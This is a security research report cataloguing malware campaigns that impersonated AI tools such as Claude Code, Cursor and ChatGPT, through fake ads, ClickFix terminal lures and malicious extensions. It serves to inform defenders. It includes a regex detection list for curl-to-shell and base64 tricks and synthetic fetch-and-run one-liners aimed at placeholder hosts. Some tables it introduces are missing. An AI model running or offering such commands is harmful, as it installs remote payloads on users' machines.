Between February 2025 and March 2026, at least 20 distinct malware campaigns have targeted AI and vibe coding tools specifically. The targets span the full stack of the AI developer ecosystem: code editors (Cursor, Claude Code), AI agents (OpenClaw), LLM platforms (ChatGPT, DeepSeek, Grok), AI-powered browser extensions, AI video generators (Luma AI, Kling AI), and AI business tools (NovaLeads AI, InVideo AI).
This report catalogs every publicly documented campaign, maps the attack vectors, and identifies which tools have been hit and which are next.
The research builds on our deep-dive analysis, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads," which documented one of the most sophisticated campaigns in this dataset: a pixel-perfect Squarespace replica of Anthropic's official documentation, promoted through Google Ads, delivering the Amatera Stealer through an obfuscated multi-stage payload chain. That campaign, cataloged here as #18, exemplifies the attack patterns now proliferating across the ecosystem.
The campaigns cluster into five distinct attack vectors, each exploiting a different trust boundary.
Seven campaigns used paid search ads or search engine poisoning. The technique is straightforward: buy an ad for "install [AI tool]" and serve a convincing clone. The InstallFix campaign targeting Claude Code is the most sophisticated example, serving its replica of Anthropic's documentation from a Squarespace page promoted through Google Ads.
The OpenClaw campaign introduced a new variant: simply hosting fake repos on GitHub was enough to get them promoted by Bing's AI-generated search results. No ad purchase was needed. As Huntress noted, "just hosting the malware on GitHub was enough to poison Bing AI search results." [17] This is a significant escalation because it means AI-powered search is now an attack surface itself.
Three campaigns exploited user-generated content on the AI platforms' own domains. The ChatGPT shared-chat attack (Kaspersky, December 2025) is particularly clever: attackers create a public ChatGPT conversation containing a fake "Atlas browser" installation guide with a ClickFix terminal command. The link leads to chatgpt.com/share/..., which is OpenAI's legitimate domain. The AdGuard-reported campaign (February 2026) does the same thing with claude.ai artifacts, creating fake Homebrew install guides on Anthropic's own domain and buying Google Ads to promote them.
The trust chain is devastating: Google Ad → official AI platform domain → user-generated malicious content. The victim never leaves a "trusted" site.
Six campaigns targeted browser extension or IDE extension marketplaces. The scale is staggering: the Microsoft-reported campaign alone reached 900,000 installs across 20,000+ enterprise tenants. The AiFrame campaign hit 260,000 users. The VS Code AI extension campaign reached 1.5 million downloads.
Extension marketplaces are the weakest link. Review processes are insufficient, and users have been trained to install extensions casually. The Cursor $500K theft started with a single malicious VS Code extension.
Five campaigns used standalone fake websites distributed through SEO manipulation or social media advertising. The UNC6032 campaign (Mandiant/Google) ran thousands of ads on Facebook and LinkedIn for fake versions of Luma AI, Canva Dream Lab, and Kling AI, reaching 2.3 million users in the EU alone. The DeepSeek campaigns used both Google Ads and standalone phishing sites with fake CAPTCHA pages.
One confirmed campaign targeted the npm registry with malicious packages impersonating Cursor IDE tools for macOS. This vector is particularly dangerous because developers install packages programmatically, often without manual review.
Not all AI tools face equal risk. The following breakdown shows which tools have been hit, how many times, and through what vectors.
ChatGPT is the most targeted AI tool by a wide margin, appearing in five separate campaigns. This makes sense: it has the largest user base and the strongest brand recognition, making it the most effective lure. Cursor IDE is the most targeted AI code editor with three distinct campaigns across three different vectors (ads, extensions, npm), demonstrating that attackers probe every possible entry point.
Of the 20 campaigns, the platform targeting breaks down as follows:
macOS is disproportionately targeted relative to its market share. Seven campaigns target macOS exclusively, and the cross-platform campaigns also include macOS payloads. The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets).
The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.
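The "hide in plain sight" problem can be illustrated with a small defensive sketch. The pattern list below is a hypothetical heuristic for flagging pasted one-liners, not a real detector, and the example command is synthetic:

```python
import re

# Illustrative heuristic only: patterns commonly seen in ClickFix-style
# lures. A real detector would need far more coverage and context.
SUSPICIOUS_PATTERNS = [
    r"base64\s+(-d|--decode)",   # payload decoded at runtime
    r"curl[^|]*\|\s*(ba)?sh",    # download piped straight into a shell
    r"eval\s*\"?\$\(",           # eval of a command substitution
]

def flag_command(cmd: str) -> list[str]:
    """Return the suspicious patterns a pasted command matches."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, cmd)]

# Synthetic ClickFix-style one-liner (x.test is a reserved example host):
hits = flag_command("echo aGkK | base64 -d; curl -s http://x.test/a | sh")
```

The catch, as the campaigns show, is that the same `curl | sh` pattern also matches legitimate installers, which is exactly why the lure works.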
The campaigns deploy at least 13 distinct malware families, ranging from infostealers to ransomware to destructive malware.
The diversity is notable. Attackers are not deploying cookie-cutter stealers; they are tailoring payloads to the target demographic. Developers get infostealers (credentials, crypto). Business users get ransomware. The Numero malware is purely destructive, suggesting some campaigns are motivated by disruption rather than profit.
Plotting the campaigns by quarter reveals a clear acceleration:
The first 10 weeks of 2026 have already produced more campaigns than all of 2025 combined. The trend is unmistakable: as vibe coding tools go mainstream, the attack surface expands proportionally. Every new tool that gains traction becomes a target within weeks.
The following popular AI coding tools have no publicly documented impersonation or malvertising campaigns. Based on the patterns observed, they are at elevated risk.
The InstallFix technique (cloning official docs and replacing install commands) is trivially adaptable to any tool that uses curl | sh, npm install, or pip install as its primary installation method. Every tool on this list fits that profile.
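Because the cloned page keeps the official wording and only swaps the download host, checking where an install one-liner actually fetches from is one of the few signals left. A minimal sketch, assuming a per-tool allowlist of documented install hosts (the set below is illustrative, and the flagged domain is invented):

```python
import re
from urllib.parse import urlparse

# Illustrative allowlist; a real check would track each tool's
# documented install host, not a hardcoded set.
OFFICIAL_HOSTS = {"brew.sh", "sh.rustup.rs", "raw.githubusercontent.com"}

def install_hosts(command: str) -> set[str]:
    """Extract the hosts a pasted install one-liner downloads from."""
    urls = re.findall(r"https?://[^\s'\"|;]+", command)
    return {urlparse(u).hostname for u in urls}

def unexpected_hosts(command: str) -> set[str]:
    """Hosts in the command that are not on the allowlist."""
    return install_hosts(command) - OFFICIAL_HOSTS

# A cloned docs page typically keeps the command and swaps the host:
flagged = unexpected_hosts("curl -fsSL https://claude-install.example/cli.sh | sh")
```

This is the check the InstallFix clone defeats socially rather than technically: the victim never compares the host against anything.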
Three structural factors make this problem worse, not better:
First, AI search is now an attack surface. The OpenClaw campaign proved that simply hosting malicious content on GitHub is enough to get it promoted by Bing's AI search. As more users rely on AI-generated search summaries rather than manually evaluating URLs, the barrier to successful social engineering drops further.
Second, trusted domains are being weaponized. The ChatGPT shared-chat and claude.ai artifact attacks exploit the fact that AI platforms allow user-generated content on their own domains. When a Google Ad leads to chatgpt.com, even security-conscious users may lower their guard. This is a fundamental design tension: the same features that make AI tools useful (sharing, collaboration, public artifacts) create attack surface.
Third, the cloaking infrastructure is mature. Platforms like 1Campaign (exposed by Varonis, February 2026) have been operational for 3+ years, enabling attackers to bypass Google's ad review by blocking 99.2% of security-scanner traffic from ever seeing the malicious payload. [19] This means the ad review process is structurally broken for this class of attack. The attackers have industrialized their evasion.
The net result: any AI tool that gains significant search volume will be impersonated within weeks. The campaigns are cheap to run, the infrastructure is available as a service, and the targets (developers with high-value credentials) are worth the investment.
[1] Zscaler, "DeepSeek Lure Using CAPTCHAs To Spread Malware," February 25, 2025. https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
[2] Cisco Talos, "Cybercriminals camouflaging threats as AI tool installers," May 29, 2025. https://blog.talosintelligence.com/fake-ai-tool-installers/
[3] Malwarebytes, "DeepSeek users targeted with fake sponsored Google ads that deliver malware," March 26, 2025. https://www.malwarebytes.com/blog/news/2025/03/deepseek-users-targeted-with-fake-sponsored-google-ads-that-deliver-malware
[4] Kaspersky/Securelist, "Backdoors and stealers prey on DeepSeek and Grok," March 6, 2025. https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/
[5] Guardio Labs, "VibeScamming - From Prompt to Phish," April 9, 2025. https://medium.com/@guardiosecurity/vibescamming-from-prompt-to-phish
[6] The Hacker News, "Malicious npm Packages Infect 3200+ Cursor Users With Backdoor," May 9, 2025. https://thehackernews.com/2025/05/malicious-npm-packages-infect-3200.html
[7] Mandiant/Google, "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites," May 27, 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/
[8] BleepingComputer, "Malicious VSCode extension in Cursor IDE led to $500K crypto theft," July 14, 2025. https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/
[9] ImpersonAlly, "As AI Booms, Fraudsters Follow: The Case of Cursor," September 7, 2025. https://impersonally.io/as-ai-booms-fraudsters-follow-the-case-of-cursor/
[10] Kaspersky, "The AMOS infostealer is piggybacking ChatGPT's chat-sharing feature," December 9, 2025. https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/
[11] PhoneArena/Mosyle, "Mac users are being targeted by a fake Grok app," January 12, 2026. https://www.phonearena.com/news/mac-users-are-being-targeted-by-a-fake-grok-app-and-its-powered-by-ai_id177227
[12] The Hacker News, "Malicious VS Code AI Extensions with 1.5 Million Installs Steal Data," January 26, 2026. https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html
[13] AdGuard, "Claude-linked Google ads dupe macOS users into installing malware," February 12, 2026. https://adguard.com/en/blog/claude-google-ads-malware-poisoning-macos.html
[14] LayerX, "AiFrame - Fake AI Assistant Extensions Targeting 260,000 Chrome Users," February 12, 2026. https://layerxsecurity.com/blog/aiframe-fake-ai-assistant-extensions-targeting-260000-chrome-users-via-injected-iframes/
[15] PCWorld, "30 fake AI Chrome extensions caught stealing passwords and more," February 17, 2026. https://www.pcworld.com/article/3063476/30-fake-ai-chrome-extensions-caught-stealing-passwords-and-more.html
[16] Pillar Research, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads," March 9, 2026. https://pillar.security/pillar-research/installfix
[17] BleepingComputer/Huntress, "Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware," March 5, 2026. https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/
[18] Microsoft, "Malicious AI Assistant Extensions Harvest LLM Chat Histories," March 5, 2026. https://www.microsoft.com/en-us/security/blog/2026/03/05/malicious-ai-assistant-extensions-harvest-llm-chat-histories/
[19] Varonis, "1Campaign: A New Cloaking Platform Helping Attackers Abuse Google Ads," February 24, 2026. https://www.varonis.com/blog/1campaign